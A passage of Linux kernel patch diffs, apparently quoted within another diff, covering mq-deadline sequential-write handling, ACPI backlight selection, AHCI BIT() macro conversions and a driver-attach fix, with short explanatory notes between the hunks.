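	uint64_t umulsidi3(uint32_t a, uint32_t b)
	{
		uint32_t al = a & 0xffff, ah = a >> 16;
		uint32_t bl = b & 0xffff, bh = b >> 16;
		uint64_t lo  = (uint64_t)al * bl;	/* pp0 */
		uint64_t mid = (uint64_t)al * bh	/* pp1 */
			     + (uint64_t)ah * bl;	/* pp2 */
		uint64_t hi  = (uint64_t)ah * bh;	/* pp3 */

		return (hi << 32) + (mid << 16) + lo;
	}

The bgeu/addi pairs in the assembly are the carry propagation that the
64-bit additions perform implicitly here.
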
+diff --git a/block/mq-deadline.c b/block/mq-deadline.c
+index 5639921dfa922..6672f1bce3795 100644
+--- a/block/mq-deadline.c
++++ b/block/mq-deadline.c
+@@ -130,6 +130,20 @@ static u8 dd_rq_ioclass(struct request *rq)
+ 	return IOPRIO_PRIO_CLASS(req_get_ioprio(rq));
+ }
+ 
++/*
++ * get the request before `rq' in sector-sorted order
++ */
++static inline struct request *
++deadline_earlier_request(struct request *rq)
++{
++	struct rb_node *node = rb_prev(&rq->rb_node);
++
++	if (node)
++		return rb_entry_rq(node);
++
++	return NULL;
++}
++
+ /*
+  * get the request after `rq' in sector-sorted order
+  */
+@@ -277,6 +291,39 @@ static inline int deadline_check_fifo(struct dd_per_prio *per_prio,
+ 	return 0;
+ }
+ 
++/*
++ * Check if rq has a sequential request preceding it.
++ */
++static bool deadline_is_seq_writes(struct deadline_data *dd, struct request *rq)
++{
++	struct request *prev = deadline_earlier_request(rq);
++
++	if (!prev)
++		return false;
++
++	return blk_rq_pos(prev) + blk_rq_sectors(prev) == blk_rq_pos(rq);
++}
++
++/*
++ * Skip all write requests that are sequential from @rq, even if we cross
++ * a zone boundary.
++ */
++static struct request *deadline_skip_seq_writes(struct deadline_data *dd,
++						struct request *rq)
++{
++	sector_t pos = blk_rq_pos(rq);
++	sector_t skipped_sectors = 0;
++
++	while (rq) {
++		if (blk_rq_pos(rq) != pos + skipped_sectors)
++			break;
++		skipped_sectors += blk_rq_sectors(rq);
++		rq = deadline_latter_request(rq);
++	}
++
++	return rq;
++}
++
+ /*
+  * For the specified data direction, return the next request to
+  * dispatch using arrival ordered lists.
+@@ -297,11 +344,16 @@ deadline_fifo_request(struct deadline_data *dd, struct dd_per_prio *per_prio,
+ 
+ 	/*
+ 	 * Look for a write request that can be dispatched, that is one with
+-	 * an unlocked target zone.
++	 * an unlocked target zone. For some HDDs, breaking a sequential
++	 * write stream can lead to lower throughput, so make sure to preserve
++	 * sequential write streams, even if that stream crosses into the next
++	 * zones and these zones are unlocked.
+ 	 */
+ 	spin_lock_irqsave(&dd->zone_lock, flags);
+ 	list_for_each_entry(rq, &per_prio->fifo_list[DD_WRITE], queuelist) {
+-		if (blk_req_can_dispatch_to_zone(rq))
++		if (blk_req_can_dispatch_to_zone(rq) &&
++		    (blk_queue_nonrot(rq->q) ||
++		     !deadline_is_seq_writes(dd, rq)))
+ 			goto out;
+ 	}
+ 	rq = NULL;
+@@ -331,13 +383,19 @@ deadline_next_request(struct deadline_data *dd, struct dd_per_prio *per_prio,
+ 
+ 	/*
+ 	 * Look for a write request that can be dispatched, that is one with
+-	 * an unlocked target zone.
++	 * an unlocked target zone. For some HDDs, breaking a sequential
++	 * write stream can lead to lower throughput, so make sure to preserve
++	 * sequential write streams, even if that stream crosses into the next
++	 * zones and these zones are unlocked.
+ 	 */
+ 	spin_lock_irqsave(&dd->zone_lock, flags);
+ 	while (rq) {
+ 		if (blk_req_can_dispatch_to_zone(rq))
+ 			break;
+-		rq = deadline_latter_request(rq);
++		if (blk_queue_nonrot(rq->q))
++			rq = deadline_latter_request(rq);
++		else
++			rq = deadline_skip_seq_writes(dd, rq);
+ 	}
+ 	spin_unlock_irqrestore(&dd->zone_lock, flags);
+ 
+@@ -789,6 +847,18 @@ static void dd_prepare_request(struct request *rq)
+ 	rq->elv.priv[0] = NULL;
+ }
+ 
++static bool dd_has_write_work(struct blk_mq_hw_ctx *hctx)
++{
++	struct deadline_data *dd = hctx->queue->elevator->elevator_data;
++	enum dd_prio p;
++
++	for (p = 0; p <= DD_PRIO_MAX; p++)
++		if (!list_empty_careful(&dd->per_prio[p].fifo_list[DD_WRITE]))
++			return true;
++
++	return false;
++}
++
+ /*
+  * Callback from inside blk_mq_free_request().
+  *
+@@ -828,9 +898,10 @@ static void dd_finish_request(struct request *rq)
+ 
+ 		spin_lock_irqsave(&dd->zone_lock, flags);
+ 		blk_req_zone_write_unlock(rq);
+-		if (!list_empty(&per_prio->fifo_list[DD_WRITE]))
+-			blk_mq_sched_mark_restart_hctx(rq->mq_hctx);
+ 		spin_unlock_irqrestore(&dd->zone_lock, flags);
++
++		if (dd_has_write_work(rq->mq_hctx))
++			blk_mq_sched_mark_restart_hctx(rq->mq_hctx);
+ 	}
+ }
+ 
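
The contiguity test behind deadline_is_seq_writes() is simply "the next
request starts where the previous one ends". A hedged standalone sketch
(seq_after() is a made-up helper name):

	#include <stdbool.h>
	#include <stdint.h>

	static bool seq_after(uint64_t prev_pos, uint32_t prev_sectors,
			      uint64_t next_pos)
	{
		/* e.g. seq_after(1000, 8, 1008): sectors 1000..1007, then 1008 */
		return prev_pos + prev_sectors == next_pos;
	}

deadline_skip_seq_writes() applies the same test repeatedly, accumulating
skipped_sectors so an entire stream is stepped over in one pass.
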
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 13f10fbcd7f03..76b7e7f8894e7 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -734,6 +734,16 @@ static bool google_cros_ec_present(void)
+ 	return acpi_dev_found("GOOG0004") || acpi_dev_found("GOOG000C");
+ }
+ 
++/*
++ * Windows 8 and newer no longer use the ACPI video interface, so it often
++ * does not work; on win8+ systems, prefer native brightness control instead.
++ * Chromebooks should always prefer native backlight control.
++ */
++static bool prefer_native_over_acpi_video(void)
++{
++	return acpi_osi_is_win8() || google_cros_ec_present();
++}
++
+ /*
+  * Determine which type of backlight interface to use on this system,
+  * First check cmdline, then dmi quirks, then do autodetect.
+@@ -779,28 +789,16 @@ static enum acpi_backlight_type __acpi_video_get_backlight_type(bool native)
+ 	if (apple_gmux_backlight_present())
+ 		return acpi_backlight_apple_gmux;
+ 
+-	/* Chromebooks should always prefer native backlight control. */
+-	if (google_cros_ec_present() && native_available)
+-		return acpi_backlight_native;
++	/* Use ACPI video if available, except when native should be preferred. */
++	if ((video_caps & ACPI_VIDEO_BACKLIGHT) &&
++	     !(native_available && prefer_native_over_acpi_video()))
++		return acpi_backlight_video;
+ 
+-	/* On systems with ACPI video use either native or ACPI video. */
+-	if (video_caps & ACPI_VIDEO_BACKLIGHT) {
+-		/*
+-		 * Windows 8 and newer no longer use the ACPI video interface,
+-		 * so it often does not work. If the ACPI tables are written
+-		 * for win8 and native brightness ctl is available, use that.
+-		 *
+-		 * The native check deliberately is inside the if acpi-video
+-		 * block on older devices without acpi-video support native
+-		 * is usually not the best choice.
+-		 */
+-		if (acpi_osi_is_win8() && native_available)
+-			return acpi_backlight_native;
+-		else
+-			return acpi_backlight_video;
+-	}
++	/* Use native if available */
++	if (native_available)
++		return acpi_backlight_native;
+ 
+-	/* No ACPI video (old hw), use vendor specific fw methods. */
++	/* No ACPI video/native (old hw), use vendor specific fw methods. */
+ 	return acpi_backlight_vendor;
+ }
+ 
+@@ -812,18 +810,6 @@ EXPORT_SYMBOL(acpi_video_get_backlight_type);
+ 
+ bool acpi_video_backlight_use_native(void)
+ {
+-	/*
+-	 * Call __acpi_video_get_backlight_type() to let it know that
+-	 * a native backlight is available.
+-	 */
+-	__acpi_video_get_backlight_type(true);
+-
+-	/*
+-	 * For now just always return true. There is a whole bunch of laptop
+-	 * models where (video_caps & ACPI_VIDEO_BACKLIGHT) is false causing
+-	 * __acpi_video_get_backlight_type() to return vendor, while these
+-	 * models only have a native backlight control.
+-	 */
+-	return true;
++	return __acpi_video_get_backlight_type(true) == acpi_backlight_native;
+ }
+ EXPORT_SYMBOL(acpi_video_backlight_use_native);
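
After this rework the backlight selection ladder reads, in order (a
condensed summary of __acpi_video_get_backlight_type(), not verbatim code):

	cmdline or DMI quirk                        -> honored first (unchanged)
	apple-gmux present                          -> acpi_backlight_apple_gmux
	ACPI video cap, unless native is available
	  and win8+/Chromebook prefers native       -> acpi_backlight_video
	native available                            -> acpi_backlight_native
	otherwise                                   -> acpi_backlight_vendor

acpi_video_backlight_use_native() now reports the real outcome of that
ladder instead of unconditionally returning true.
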
+diff --git a/drivers/ata/ahci.h b/drivers/ata/ahci.h
+index 7add8e79912b1..ff8e6ae1c6362 100644
+--- a/drivers/ata/ahci.h
++++ b/drivers/ata/ahci.h
+@@ -24,6 +24,7 @@
+ #include <linux/libata.h>
+ #include <linux/phy/phy.h>
+ #include <linux/regulator/consumer.h>
++#include <linux/bits.h>
+ 
+ /* Enclosure Management Control */
+ #define EM_CTRL_MSG_TYPE              0x000f0000
+@@ -53,12 +54,12 @@ enum {
+ 	AHCI_PORT_PRIV_FBS_DMA_SZ	= AHCI_CMD_SLOT_SZ +
+ 					  AHCI_CMD_TBL_AR_SZ +
+ 					  (AHCI_RX_FIS_SZ * 16),
+-	AHCI_IRQ_ON_SG		= (1 << 31),
+-	AHCI_CMD_ATAPI		= (1 << 5),
+-	AHCI_CMD_WRITE		= (1 << 6),
+-	AHCI_CMD_PREFETCH	= (1 << 7),
+-	AHCI_CMD_RESET		= (1 << 8),
+-	AHCI_CMD_CLR_BUSY	= (1 << 10),
++	AHCI_IRQ_ON_SG		= BIT(31),
++	AHCI_CMD_ATAPI		= BIT(5),
++	AHCI_CMD_WRITE		= BIT(6),
++	AHCI_CMD_PREFETCH	= BIT(7),
++	AHCI_CMD_RESET		= BIT(8),
++	AHCI_CMD_CLR_BUSY	= BIT(10),
+ 
+ 	RX_FIS_PIO_SETUP	= 0x20,	/* offset of PIO Setup FIS data */
+ 	RX_FIS_D2H_REG		= 0x40,	/* offset of D2H Register FIS data */
+@@ -76,37 +77,37 @@ enum {
+ 	HOST_CAP2		= 0x24, /* host capabilities, extended */
+ 
+ 	/* HOST_CTL bits */
+-	HOST_RESET		= (1 << 0),  /* reset controller; self-clear */
+-	HOST_IRQ_EN		= (1 << 1),  /* global IRQ enable */
+-	HOST_MRSM		= (1 << 2),  /* MSI Revert to Single Message */
+-	HOST_AHCI_EN		= (1 << 31), /* AHCI enabled */
++	HOST_RESET		= BIT(0),  /* reset controller; self-clear */
++	HOST_IRQ_EN		= BIT(1),  /* global IRQ enable */
++	HOST_MRSM		= BIT(2),  /* MSI Revert to Single Message */
++	HOST_AHCI_EN		= BIT(31), /* AHCI enabled */
+ 
+ 	/* HOST_CAP bits */
+-	HOST_CAP_SXS		= (1 << 5),  /* Supports External SATA */
+-	HOST_CAP_EMS		= (1 << 6),  /* Enclosure Management support */
+-	HOST_CAP_CCC		= (1 << 7),  /* Command Completion Coalescing */
+-	HOST_CAP_PART		= (1 << 13), /* Partial state capable */
+-	HOST_CAP_SSC		= (1 << 14), /* Slumber state capable */
+-	HOST_CAP_PIO_MULTI	= (1 << 15), /* PIO multiple DRQ support */
+-	HOST_CAP_FBS		= (1 << 16), /* FIS-based switching support */
+-	HOST_CAP_PMP		= (1 << 17), /* Port Multiplier support */
+-	HOST_CAP_ONLY		= (1 << 18), /* Supports AHCI mode only */
+-	HOST_CAP_CLO		= (1 << 24), /* Command List Override support */
+-	HOST_CAP_LED		= (1 << 25), /* Supports activity LED */
+-	HOST_CAP_ALPM		= (1 << 26), /* Aggressive Link PM support */
+-	HOST_CAP_SSS		= (1 << 27), /* Staggered Spin-up */
+-	HOST_CAP_MPS		= (1 << 28), /* Mechanical presence switch */
+-	HOST_CAP_SNTF		= (1 << 29), /* SNotification register */
+-	HOST_CAP_NCQ		= (1 << 30), /* Native Command Queueing */
+-	HOST_CAP_64		= (1 << 31), /* PCI DAC (64-bit DMA) support */
++	HOST_CAP_SXS		= BIT(5),  /* Supports External SATA */
++	HOST_CAP_EMS		= BIT(6),  /* Enclosure Management support */
++	HOST_CAP_CCC		= BIT(7),  /* Command Completion Coalescing */
++	HOST_CAP_PART		= BIT(13), /* Partial state capable */
++	HOST_CAP_SSC		= BIT(14), /* Slumber state capable */
++	HOST_CAP_PIO_MULTI	= BIT(15), /* PIO multiple DRQ support */
++	HOST_CAP_FBS		= BIT(16), /* FIS-based switching support */
++	HOST_CAP_PMP		= BIT(17), /* Port Multiplier support */
++	HOST_CAP_ONLY		= BIT(18), /* Supports AHCI mode only */
++	HOST_CAP_CLO		= BIT(24), /* Command List Override support */
++	HOST_CAP_LED		= BIT(25), /* Supports activity LED */
++	HOST_CAP_ALPM		= BIT(26), /* Aggressive Link PM support */
++	HOST_CAP_SSS		= BIT(27), /* Staggered Spin-up */
++	HOST_CAP_MPS		= BIT(28), /* Mechanical presence switch */
++	HOST_CAP_SNTF		= BIT(29), /* SNotification register */
++	HOST_CAP_NCQ		= BIT(30), /* Native Command Queueing */
++	HOST_CAP_64		= BIT(31), /* PCI DAC (64-bit DMA) support */
+ 
+ 	/* HOST_CAP2 bits */
+-	HOST_CAP2_BOH		= (1 << 0),  /* BIOS/OS handoff supported */
+-	HOST_CAP2_NVMHCI	= (1 << 1),  /* NVMHCI supported */
+-	HOST_CAP2_APST		= (1 << 2),  /* Automatic partial to slumber */
+-	HOST_CAP2_SDS		= (1 << 3),  /* Support device sleep */
+-	HOST_CAP2_SADM		= (1 << 4),  /* Support aggressive DevSlp */
+-	HOST_CAP2_DESO		= (1 << 5),  /* DevSlp from slumber only */
++	HOST_CAP2_BOH		= BIT(0),  /* BIOS/OS handoff supported */
++	HOST_CAP2_NVMHCI	= BIT(1),  /* NVMHCI supported */
++	HOST_CAP2_APST		= BIT(2),  /* Automatic partial to slumber */
++	HOST_CAP2_SDS		= BIT(3),  /* Support device sleep */
++	HOST_CAP2_SADM		= BIT(4),  /* Support aggressive DevSlp */
++	HOST_CAP2_DESO		= BIT(5),  /* DevSlp from slumber only */
+ 
+ 	/* registers for each SATA port */
+ 	PORT_LST_ADDR		= 0x00, /* command list DMA addr */
+@@ -128,24 +129,24 @@ enum {
+ 	PORT_DEVSLP		= 0x44, /* device sleep */
+ 
+ 	/* PORT_IRQ_{STAT,MASK} bits */
+-	PORT_IRQ_COLD_PRES	= (1 << 31), /* cold presence detect */
+-	PORT_IRQ_TF_ERR		= (1 << 30), /* task file error */
+-	PORT_IRQ_HBUS_ERR	= (1 << 29), /* host bus fatal error */
+-	PORT_IRQ_HBUS_DATA_ERR	= (1 << 28), /* host bus data error */
+-	PORT_IRQ_IF_ERR		= (1 << 27), /* interface fatal error */
+-	PORT_IRQ_IF_NONFATAL	= (1 << 26), /* interface non-fatal error */
+-	PORT_IRQ_OVERFLOW	= (1 << 24), /* xfer exhausted available S/G */
+-	PORT_IRQ_BAD_PMP	= (1 << 23), /* incorrect port multiplier */
+-
+-	PORT_IRQ_PHYRDY		= (1 << 22), /* PhyRdy changed */
+-	PORT_IRQ_DMPS		= (1 << 7), /* mechanical presence status */
+-	PORT_IRQ_CONNECT	= (1 << 6), /* port connect change status */
+-	PORT_IRQ_SG_DONE	= (1 << 5), /* descriptor processed */
+-	PORT_IRQ_UNK_FIS	= (1 << 4), /* unknown FIS rx'd */
+-	PORT_IRQ_SDB_FIS	= (1 << 3), /* Set Device Bits FIS rx'd */
+-	PORT_IRQ_DMAS_FIS	= (1 << 2), /* DMA Setup FIS rx'd */
+-	PORT_IRQ_PIOS_FIS	= (1 << 1), /* PIO Setup FIS rx'd */
+-	PORT_IRQ_D2H_REG_FIS	= (1 << 0), /* D2H Register FIS rx'd */
++	PORT_IRQ_COLD_PRES	= BIT(31), /* cold presence detect */
++	PORT_IRQ_TF_ERR		= BIT(30), /* task file error */
++	PORT_IRQ_HBUS_ERR	= BIT(29), /* host bus fatal error */
++	PORT_IRQ_HBUS_DATA_ERR	= BIT(28), /* host bus data error */
++	PORT_IRQ_IF_ERR		= BIT(27), /* interface fatal error */
++	PORT_IRQ_IF_NONFATAL	= BIT(26), /* interface non-fatal error */
++	PORT_IRQ_OVERFLOW	= BIT(24), /* xfer exhausted available S/G */
++	PORT_IRQ_BAD_PMP	= BIT(23), /* incorrect port multiplier */
++
++	PORT_IRQ_PHYRDY		= BIT(22), /* PhyRdy changed */
++	PORT_IRQ_DMPS		= BIT(7),  /* mechanical presence status */
++	PORT_IRQ_CONNECT	= BIT(6),  /* port connect change status */
++	PORT_IRQ_SG_DONE	= BIT(5),  /* descriptor processed */
++	PORT_IRQ_UNK_FIS	= BIT(4),  /* unknown FIS rx'd */
++	PORT_IRQ_SDB_FIS	= BIT(3),  /* Set Device Bits FIS rx'd */
++	PORT_IRQ_DMAS_FIS	= BIT(2),  /* DMA Setup FIS rx'd */
++	PORT_IRQ_PIOS_FIS	= BIT(1),  /* PIO Setup FIS rx'd */
++	PORT_IRQ_D2H_REG_FIS	= BIT(0),  /* D2H Register FIS rx'd */
+ 
+ 	PORT_IRQ_FREEZE		= PORT_IRQ_HBUS_ERR |
+ 				  PORT_IRQ_IF_ERR |
+@@ -161,27 +162,27 @@ enum {
+ 				  PORT_IRQ_PIOS_FIS | PORT_IRQ_D2H_REG_FIS,
+ 
+ 	/* PORT_CMD bits */
+-	PORT_CMD_ASP		= (1 << 27), /* Aggressive Slumber/Partial */
+-	PORT_CMD_ALPE		= (1 << 26), /* Aggressive Link PM enable */
+-	PORT_CMD_ATAPI		= (1 << 24), /* Device is ATAPI */
+-	PORT_CMD_FBSCP		= (1 << 22), /* FBS Capable Port */
+-	PORT_CMD_ESP		= (1 << 21), /* External Sata Port */
+-	PORT_CMD_CPD		= (1 << 20), /* Cold Presence Detection */
+-	PORT_CMD_MPSP		= (1 << 19), /* Mechanical Presence Switch */
+-	PORT_CMD_HPCP		= (1 << 18), /* HotPlug Capable Port */
+-	PORT_CMD_PMP		= (1 << 17), /* PMP attached */
+-	PORT_CMD_LIST_ON	= (1 << 15), /* cmd list DMA engine running */
+-	PORT_CMD_FIS_ON		= (1 << 14), /* FIS DMA engine running */
+-	PORT_CMD_FIS_RX		= (1 << 4), /* Enable FIS receive DMA engine */
+-	PORT_CMD_CLO		= (1 << 3), /* Command list override */
+-	PORT_CMD_POWER_ON	= (1 << 2), /* Power up device */
+-	PORT_CMD_SPIN_UP	= (1 << 1), /* Spin up device */
+-	PORT_CMD_START		= (1 << 0), /* Enable port DMA engine */
+-
+-	PORT_CMD_ICC_MASK	= (0xf << 28), /* i/f ICC state mask */
+-	PORT_CMD_ICC_ACTIVE	= (0x1 << 28), /* Put i/f in active state */
+-	PORT_CMD_ICC_PARTIAL	= (0x2 << 28), /* Put i/f in partial state */
+-	PORT_CMD_ICC_SLUMBER	= (0x6 << 28), /* Put i/f in slumber state */
++	PORT_CMD_ASP		= BIT(27), /* Aggressive Slumber/Partial */
++	PORT_CMD_ALPE		= BIT(26), /* Aggressive Link PM enable */
++	PORT_CMD_ATAPI		= BIT(24), /* Device is ATAPI */
++	PORT_CMD_FBSCP		= BIT(22), /* FBS Capable Port */
++	PORT_CMD_ESP		= BIT(21), /* External Sata Port */
++	PORT_CMD_CPD		= BIT(20), /* Cold Presence Detection */
++	PORT_CMD_MPSP		= BIT(19), /* Mechanical Presence Switch */
++	PORT_CMD_HPCP		= BIT(18), /* HotPlug Capable Port */
++	PORT_CMD_PMP		= BIT(17), /* PMP attached */
++	PORT_CMD_LIST_ON	= BIT(15), /* cmd list DMA engine running */
++	PORT_CMD_FIS_ON		= BIT(14), /* FIS DMA engine running */
++	PORT_CMD_FIS_RX		= BIT(4),  /* Enable FIS receive DMA engine */
++	PORT_CMD_CLO		= BIT(3),  /* Command list override */
++	PORT_CMD_POWER_ON	= BIT(2),  /* Power up device */
++	PORT_CMD_SPIN_UP	= BIT(1),  /* Spin up device */
++	PORT_CMD_START		= BIT(0),  /* Enable port DMA engine */
++
++	PORT_CMD_ICC_MASK	= (0xfu << 28), /* i/f ICC state mask */
++	PORT_CMD_ICC_ACTIVE	= (0x1u << 28), /* Put i/f in active state */
++	PORT_CMD_ICC_PARTIAL	= (0x2u << 28), /* Put i/f in partial state */
++	PORT_CMD_ICC_SLUMBER	= (0x6u << 28), /* Put i/f in slumber state */
+ 
+ 	/* PORT_CMD capabilities mask */
+ 	PORT_CMD_CAP		= PORT_CMD_HPCP | PORT_CMD_MPSP |
+@@ -192,9 +193,9 @@ enum {
+ 	PORT_FBS_ADO_OFFSET	= 12, /* FBS active dev optimization offset */
+ 	PORT_FBS_DEV_OFFSET	= 8,  /* FBS device to issue offset */
+ 	PORT_FBS_DEV_MASK	= (0xf << PORT_FBS_DEV_OFFSET),  /* FBS.DEV */
+-	PORT_FBS_SDE		= (1 << 2), /* FBS single device error */
+-	PORT_FBS_DEC		= (1 << 1), /* FBS device error clear */
+-	PORT_FBS_EN		= (1 << 0), /* Enable FBS */
++	PORT_FBS_SDE		= BIT(2), /* FBS single device error */
++	PORT_FBS_DEC		= BIT(1), /* FBS device error clear */
++	PORT_FBS_EN		= BIT(0), /* Enable FBS */
+ 
+ 	/* PORT_DEVSLP bits */
+ 	PORT_DEVSLP_DM_OFFSET	= 25,             /* DITO multiplier offset */
+@@ -202,50 +203,50 @@ enum {
+ 	PORT_DEVSLP_DITO_OFFSET	= 15,             /* DITO offset */
+ 	PORT_DEVSLP_MDAT_OFFSET	= 10,             /* Minimum assertion time */
+ 	PORT_DEVSLP_DETO_OFFSET	= 2,              /* DevSlp exit timeout */
+-	PORT_DEVSLP_DSP		= (1 << 1),       /* DevSlp present */
+-	PORT_DEVSLP_ADSE	= (1 << 0),       /* Aggressive DevSlp enable */
++	PORT_DEVSLP_DSP		= BIT(1),         /* DevSlp present */
++	PORT_DEVSLP_ADSE	= BIT(0),         /* Aggressive DevSlp enable */
+ 
+ 	/* hpriv->flags bits */
+ 
+ #define AHCI_HFLAGS(flags)		.private_data	= (void *)(flags)
+ 
+-	AHCI_HFLAG_NO_NCQ		= (1 << 0),
+-	AHCI_HFLAG_IGN_IRQ_IF_ERR	= (1 << 1), /* ignore IRQ_IF_ERR */
+-	AHCI_HFLAG_IGN_SERR_INTERNAL	= (1 << 2), /* ignore SERR_INTERNAL */
+-	AHCI_HFLAG_32BIT_ONLY		= (1 << 3), /* force 32bit */
+-	AHCI_HFLAG_MV_PATA		= (1 << 4), /* PATA port */
+-	AHCI_HFLAG_NO_MSI		= (1 << 5), /* no PCI MSI */
+-	AHCI_HFLAG_NO_PMP		= (1 << 6), /* no PMP */
+-	AHCI_HFLAG_SECT255		= (1 << 8), /* max 255 sectors */
+-	AHCI_HFLAG_YES_NCQ		= (1 << 9), /* force NCQ cap on */
+-	AHCI_HFLAG_NO_SUSPEND		= (1 << 10), /* don't suspend */
+-	AHCI_HFLAG_SRST_TOUT_IS_OFFLINE	= (1 << 11), /* treat SRST timeout as
+-							link offline */
+-	AHCI_HFLAG_NO_SNTF		= (1 << 12), /* no sntf */
+-	AHCI_HFLAG_NO_FPDMA_AA		= (1 << 13), /* no FPDMA AA */
+-	AHCI_HFLAG_YES_FBS		= (1 << 14), /* force FBS cap on */
+-	AHCI_HFLAG_DELAY_ENGINE		= (1 << 15), /* do not start engine on
+-						        port start (wait until
+-						        error-handling stage) */
+-	AHCI_HFLAG_NO_DEVSLP		= (1 << 17), /* no device sleep */
+-	AHCI_HFLAG_NO_FBS		= (1 << 18), /* no FBS */
++	AHCI_HFLAG_NO_NCQ		= BIT(0),
++	AHCI_HFLAG_IGN_IRQ_IF_ERR	= BIT(1), /* ignore IRQ_IF_ERR */
++	AHCI_HFLAG_IGN_SERR_INTERNAL	= BIT(2), /* ignore SERR_INTERNAL */
++	AHCI_HFLAG_32BIT_ONLY		= BIT(3), /* force 32bit */
++	AHCI_HFLAG_MV_PATA		= BIT(4), /* PATA port */
++	AHCI_HFLAG_NO_MSI		= BIT(5), /* no PCI MSI */
++	AHCI_HFLAG_NO_PMP		= BIT(6), /* no PMP */
++	AHCI_HFLAG_SECT255		= BIT(8), /* max 255 sectors */
++	AHCI_HFLAG_YES_NCQ		= BIT(9), /* force NCQ cap on */
++	AHCI_HFLAG_NO_SUSPEND		= BIT(10), /* don't suspend */
++	AHCI_HFLAG_SRST_TOUT_IS_OFFLINE	= BIT(11), /* treat SRST timeout as
++						      link offline */
++	AHCI_HFLAG_NO_SNTF		= BIT(12), /* no sntf */
++	AHCI_HFLAG_NO_FPDMA_AA		= BIT(13), /* no FPDMA AA */
++	AHCI_HFLAG_YES_FBS		= BIT(14), /* force FBS cap on */
++	AHCI_HFLAG_DELAY_ENGINE		= BIT(15), /* do not start engine on
++						      port start (wait until
++						      error-handling stage) */
++	AHCI_HFLAG_NO_DEVSLP		= BIT(17), /* no device sleep */
++	AHCI_HFLAG_NO_FBS		= BIT(18), /* no FBS */
+ 
+ #ifdef CONFIG_PCI_MSI
+-	AHCI_HFLAG_MULTI_MSI		= (1 << 20), /* per-port MSI(-X) */
++	AHCI_HFLAG_MULTI_MSI		= BIT(20), /* per-port MSI(-X) */
+ #else
+ 	/* compile out MSI infrastructure */
+ 	AHCI_HFLAG_MULTI_MSI		= 0,
+ #endif
+-	AHCI_HFLAG_WAKE_BEFORE_STOP	= (1 << 22), /* wake before DMA stop */
+-	AHCI_HFLAG_YES_ALPM		= (1 << 23), /* force ALPM cap on */
+-	AHCI_HFLAG_NO_WRITE_TO_RO	= (1 << 24), /* don't write to read
+-							only registers */
+-	AHCI_HFLAG_USE_LPM_POLICY	= (1 << 25), /* chipset that should use
+-							SATA_MOBILE_LPM_POLICY
+-							as default lpm_policy */
+-	AHCI_HFLAG_SUSPEND_PHYS		= (1 << 26), /* handle PHYs during
+-							suspend/resume */
+-	AHCI_HFLAG_NO_SXS		= (1 << 28), /* SXS not supported */
++	AHCI_HFLAG_WAKE_BEFORE_STOP	= BIT(22), /* wake before DMA stop */
++	AHCI_HFLAG_YES_ALPM		= BIT(23), /* force ALPM cap on */
++	AHCI_HFLAG_NO_WRITE_TO_RO	= BIT(24), /* don't write to read
++						      only registers */
++	AHCI_HFLAG_USE_LPM_POLICY	= BIT(25), /* chipset that should use
++						      SATA_MOBILE_LPM_POLICY
++						      as default lpm_policy */
++	AHCI_HFLAG_SUSPEND_PHYS		= BIT(26), /* handle PHYs during
++						      suspend/resume */
++	AHCI_HFLAG_NO_SXS		= BIT(28), /* SXS not supported */
+ 
+ 	/* ap->flags bits */
+ 
+@@ -261,22 +262,22 @@ enum {
+ 	EM_MAX_RETRY			= 5,
+ 
+ 	/* em_ctl bits */
+-	EM_CTL_RST		= (1 << 9), /* Reset */
+-	EM_CTL_TM		= (1 << 8), /* Transmit Message */
+-	EM_CTL_MR		= (1 << 0), /* Message Received */
+-	EM_CTL_ALHD		= (1 << 26), /* Activity LED */
+-	EM_CTL_XMT		= (1 << 25), /* Transmit Only */
+-	EM_CTL_SMB		= (1 << 24), /* Single Message Buffer */
+-	EM_CTL_SGPIO		= (1 << 19), /* SGPIO messages supported */
+-	EM_CTL_SES		= (1 << 18), /* SES-2 messages supported */
+-	EM_CTL_SAFTE		= (1 << 17), /* SAF-TE messages supported */
+-	EM_CTL_LED		= (1 << 16), /* LED messages supported */
++	EM_CTL_RST		= BIT(9), /* Reset */
++	EM_CTL_TM		= BIT(8), /* Transmit Message */
++	EM_CTL_MR		= BIT(0), /* Message Received */
++	EM_CTL_ALHD		= BIT(26), /* Activity LED */
++	EM_CTL_XMT		= BIT(25), /* Transmit Only */
++	EM_CTL_SMB		= BIT(24), /* Single Message Buffer */
++	EM_CTL_SGPIO		= BIT(19), /* SGPIO messages supported */
++	EM_CTL_SES		= BIT(18), /* SES-2 messages supported */
++	EM_CTL_SAFTE		= BIT(17), /* SAF-TE messages supported */
++	EM_CTL_LED		= BIT(16), /* LED messages supported */
+ 
+ 	/* em message type */
+-	EM_MSG_TYPE_LED		= (1 << 0), /* LED */
+-	EM_MSG_TYPE_SAFTE	= (1 << 1), /* SAF-TE */
+-	EM_MSG_TYPE_SES2	= (1 << 2), /* SES-2 */
+-	EM_MSG_TYPE_SGPIO	= (1 << 3), /* SGPIO */
++	EM_MSG_TYPE_LED		= BIT(0), /* LED */
++	EM_MSG_TYPE_SAFTE	= BIT(1), /* SAF-TE */
++	EM_MSG_TYPE_SES2	= BIT(2), /* SES-2 */
++	EM_MSG_TYPE_SGPIO	= BIT(3), /* SGPIO */
+ };
+ 
+ struct ahci_cmd_hdr {
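
Beyond readability, the BIT() conversion fixes a latent pitfall: (1 << 31)
shifts into the sign bit of a 32-bit int, which is undefined behavior in C.
BIT() shifts an unsigned long instead; simplified, it is defined along
these lines (see include/vdso/bits.h):

	#define BIT(nr) (1UL << (nr))

The same reasoning drives the (0xf << 28) -> (0xfu << 28) change for the
ICC masks, which would otherwise also overflow a signed int.
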
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 3dda62503102f..9ae2b5c4fc496 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -1162,7 +1162,11 @@ static int __driver_attach(struct device *dev, void *data)
+ 		return 0;
+ 	} else if (ret < 0) {
+ 		dev_dbg(dev, "Bus failed to match device: %d\n", ret);
+-		return ret;
++		/*
++		 * Driver could not match with device, but may match with
++		 * another device on the bus.
++		 */
++		return 0;
+ 	} /* ret > 0 means positive match */
+ 
+ 	if (driver_allows_async_probing(drv)) {
+diff --git a/drivers/bus/mhi/host/pm.c b/drivers/bus/mhi/host/pm.c
+index 4a42186ff1112..083459028a4b8 100644
+--- a/drivers/bus/mhi/host/pm.c
++++ b/drivers/bus/mhi/host/pm.c
+@@ -301,7 +301,8 @@ int mhi_pm_m0_transition(struct mhi_controller *mhi_cntrl)
+ 		read_lock_irq(&mhi_chan->lock);
+ 
